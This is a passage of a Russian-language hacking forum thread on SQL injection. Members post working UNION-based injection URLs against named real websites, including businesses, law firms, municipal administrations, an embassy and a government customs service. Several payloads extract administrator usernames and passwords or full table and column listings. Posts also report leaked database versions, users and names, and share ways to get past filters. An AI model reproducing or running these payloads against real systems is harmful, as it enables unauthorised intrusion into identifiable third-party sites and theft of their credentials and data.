SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    Фильтр не "на вывод данных" - фильтр на from. То есть FROM, fRoM и т.д. не фильтруются.
    а вот и первая табдица: admins
     
  2. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    Code:
    http://www.kenwright.com/index.php?id=-1265+union+select+1,2,version%28%29,4,5,6,7,8,9,10+--+
    Версия:5.0.95-log
    [COLOR=YellowGreen===========================[/COLOR]
    Wri GROUP
    Code:
    http://wrigroup.ca/index.php?catid=-148+union+select+%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28wrigroup_wrigroup.cfaq_admin%29where%280x00%29in%28@x:=concat%28@x,0x3c62723e,username,0x3a,password%29%29%29%29x%29,2+--+
    ===============================
    Steam Whistle Brewing
    Code:
    https://shop.steamwhistle.ca/index.php?CatID=25+union+/*!select*/+1,2,3,version%28%29,5,6,7,8,9,10,11,12,13,14+--+
    Версия: 5.0.96-community
    ===============================
    Code:
    http://www.thecis.ca/index.php?catID=40&itemID=-63+union+select+1,2,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28cistudies.cisUsers%29where%280x00%29in%28@x:=concat%28@x,0x3c62723e,userName,0x3a,userPasswd%29%29%29%29x%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+--+
    См. title или исходный код 6-я строка
    ===============================
    Code:
    http://dogbg.net/index.php?catid=-18+union+/*!select*/+1,version%28%29+--+
    Версия: 5.1.70-cll
    ==============================
    HevyMetal.com любителям тяжёлой музыки все сюда
    Code:
    https://www.heavymetal.com/index.php?id=-1946+union+/*!select*/+1,2,3,4,5,6,version%28%29,8,9,10,11,12+--+
    Версия: 5.0.96-community
    =========================
    эКОМ
    Code:
    http://ecom.su/news/index.php?id=-1232+union+select+1,2,3,4,5,6,7,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28information_schema.columns%29where%28table_schema!=0x696e666f726d6174696f6e5f736368656d61%29and%280x00%29in%28@x:=concat%28@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name%29%29%29%29x%29,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+--+
    юридическая помощь Московская коллегия адвокатов
    Code:
    http://www.trunov.com/content.php?act=showcat&id=-357+union+select+%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28information_schema.columns%29where%28table_schema!=0x696e666f726d6174696f6e5f736368656d61%29and%280x00%29in%28@x:=concat%28@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name%29%29%29%29x%29,2+--+
    см. TITLE
     
    #15582 Unknowhacker, 25 Sep 2013
    Last edited: 25 Sep 2013
    1 person likes this.
  3. RedX

    RedX Member

    Joined:
    12 Jun 2008
    Messages:
    40
    Likes Received:
    13
    Reputations:
    4
    УКР Пром
    @@basedir - 5: /usr/
    user() - 14: zmey@localhost
    database() - 16: zmey_ukrprom_new
    version() - 10: 5.0.77-log
     
  4. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    Центр Юридической Помощи
    Code:
    http://arbitrsud.com/index.php?mat=[COLOR=YellowGreen]-12+union+select+1,2,3,version%28%29,5,6,7,8,9,10,11,12+--+[/COLOR]
    Версия: 5.1.70-log BLIND
    Фильтр пропускает FrOm
     
  5. AC//DC

    AC//DC Active Member

    Joined:
    28 Jul 2009
    Messages:
    419
    Likes Received:
    147
    Reputations:
    88
    [​IMG]

    http://www.wtech.ru/?page=market&razd=-5%20and%201=2%20union%20select%201,concat_ws(0x3a,@@version,user(),database()),3,4,5--

    5.1.68-cll wtech_wtech@localhost wtech_vt
     
  6. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    https://koki-es.de/shop_index.php?action=progr_detail&param=detail&id=-680+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+--+
     
  7. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    Уральский Авто аукцион
    Code:
    http://www.uralaa.ru/moto.php?id=-317%27+union+select+1,2,3,4,5,6,7,version%28%29,9,user%28%29,database%28%29,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+--+
    Версия: 5.0.96-community
    Пользователь: uralaa_uralaa@localhost
    БД: uralaa_uralaaru

    Mistoveloce.It Итальянский сайт спортивных мотоциклов
    Code:
    http://mistoveloce.it/moto.php?id=488%27+union+select+1,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28mistodb.users%29where%280x00%29in%28@x:=concat%28@x,0x3c62723e,username,0x3a,password%29%29%29%29x%29,3,4,5,6,7,8,9,10,11,12+--+
    Итальянские скутеры, мопеды
    Code:
    http://www.autoexclusive.it/fra/moto.php?id=-23+union+select+1,2,3,4,5,6,7,version%28%29,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+--+
    Версия: 5.0.92-enterprise-gpl-log (Есть фильтр на вывод данных)
    Code:
    
    [COLOR=Red]Cuir JB | Moto[/COLOR]
    http://www.cuir-mode-jb.com/moto.php?id=2[COLOR=DarkOrange]+order+by+7+--+[/COLOR]
    JPLand
    Code:
    http://jpland.ru/mototehnika.php?id=160%27+UNION+SELECT+user%28%29,2,3,4,version%28%29,6,7,8,9,10+--+
    Версия: 4.1.22-log

    Honda Aphla (Мотоциклы Хонда) официальный сайт
    Code:
    http://www.hondaalpina.com.br/moto.php?id=3911/**//*!uNiOn*//**//*!SELECT*/1/*!,*/2/*!,*/version%28%29/*!,*/4/*!,*/5/*!,*/6/*!,*/7/*!,*/8/*!,*/9/*!,*/10/*!,*/11/*!,*/12/*!,*/13/*!,*/14/*!,*/15/*!,*/16/*!,*/17/*!,*/18/*!,*/19/*!,*/20/*!,*/21/*!,*/22+--+
    Версия: 5.1.70-cll
     
    #15587 Unknowhacker, 28 Sep 2013
    Last edited: 28 Sep 2013
  8. BLurpi^_^

    BLurpi^_^ Banned

    Joined:
    9 Feb 2011
    Messages:
    218
    Likes Received:
    26
    Reputations:
    9
    вывод справа в корзине
     
  9. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    207
    Likes Received:
    46
    Reputations:
    33
    Code:
    http://www.futuresfins.com/fin-detail.php?id=-173+union+select+concat_ws(0x3a,version(),user(),database()),2,3,4,5,6,7,8,9,10,11--
     
    1 person likes this.
  10. Иван8

    Иван8 Elder - Старейшина

    Joined:
    21 Aug 2008
    Messages:
    71
    Likes Received:
    11
    Reputations:
    6
    Code:
    олимп-омск.рф/catalog.php?cid=-47+union+select+1,version(),3,4,5,6,7,8,9,10,11,user(),database()+--+
    www.kinoteatrdoc.ru/press.php?id=-59+union+select+user(),databas(),version()+--+
    sedimental.com/catalog/index.php?ID=-59'+UNION+SELECT+1,database(),user(),version(),5,6,7,8,9,10,11,12,13,14,15,16,17+--+
    www.krasarossii.ru/blocks/2012-kr.php?id=-59+union+select+1,55,user(),4,database(),6,version(),8,9+--+
     
    1 person likes this.
  11. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    306
    Likes Received:
    138
    Reputations:
    33
    Система активной рекламы !

    http://novabux.ru/news.php?id=0%27+union+select+1,group_concat(0x03a,column_name),3,4+from+information_schema.columns+where+table_name=0x74625F7573657273+--+


    И сайт Философской антропологии

    http://encycl.anthropology.ru/article.php/?id=1+union+select+1,@@version,3,4,5,6,7,8,9,10+--
     
    #15591 WallHack, 30 Sep 2013
    Last edited: 30 Sep 2013
    1 person likes this.
  12. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    ==============================================
     
  13. Улыбайся

    Joined:
    23 Oct 2011
    Messages:
    71
    Likes Received:
    7
    Reputations:
    3
    Депутат Совета депутатов муниципального образования Оренбургский район
    http://vakalinin.ru/index.php?name=news&id=-23%27+union+select+1,2,database%28%29,@@version,5,6,7+--+
     
    1 person likes this.
  14. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    207
    Likes Received:
    46
    Reputations:
    33
    АДМИНИСТРАЦИЯ МУНИЦИПАЛЬНОГО ОБРАЗОВАНИЯ
    ПРИГОРОДНЫЙ СЕЛЬСОВЕТ ОРЕНБУРГСКОГО РАЙОНА ОРЕНБУРГСКОЙ ОБЛАСТИ

    Code:
    http://moprigorod.ru/news.php?id=-49'+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5+--+
     
    1 person likes this.
  15. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    Американское Сообщество Международного Законодательства
    Code:
    http://www.eisil.org/index.php?t=sub_pages&cat=-185+union+Select+1,2,3,4,version%28%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+--+
    Версия: 5.0.77
    Note: При запросе вывода данных браузер виснет.
    ===========================================
    Mo-Ranch Conference Center
    Code:
    http://www.moranch.com/index.php?t=-6+union+select+%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28information_schema.columns%29where%28table_schema!=0x696e666f726d6174696f6e5f736368656d61%29and%280x00%29in%28@x:=concat%28@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name%29%29%29%29x%29+--+
     
    #15595 Unknowhacker, 1 Oct 2013
    Last edited: 1 Oct 2013
  16. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    207
    Likes Received:
    46
    Reputations:
    33
    EDU
    Code:
    http://www.mes.edu.eg/newsletter_archive.php?id=-1+union+select+1,concat_ws(0x3a,version(),user(),database()),0x4861636b6564206279205365706f,4,5--
     
  17. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    Европейский Центр Защиты Прав Человека ;)

    Code:
    http://ehracmos.memo.ru/page.php?page=-14%27+union+select+1,2,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28u366344.writers%29where%280x00%29in%28@x:=concat%28@x,0x3c62723e,username,0x3a,password%29%29%29%29x%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+--+
    NOTE: Вся правда здесь -)
     
    1 person likes this.
  18. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    207
    Likes Received:
    46
    Reputations:
    33
    Code:
    http://azembassy.pl/pl/index.php?section=-11+/**/union/**/+/**/select/**/+1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),user(),database()),10,11,12,13,14+--+
    Code:
    5.5.33:[email protected]:azembassy_hotcom
     
  19. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    ==============================================
    pr=4
    ==============================================
    ==============================================
    ==============================================
    тиц=10 pr=5
    ==============================================
    pr=4
    ==============================================
    pr=7
    ==============================================
     
  20. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    207
    Likes Received:
    46
    Reputations:
    33
    Сирийская таможенная служба
    Code:
    http://www.customs.gov.sy/Tariff.php?sid=-01+union+selecT+1,2,3,concat_ws(0x3a,version(),user(),database(),0x4861636b6564206279205365706f),5,6,7--
     
Thread Status:
Not open for further replies.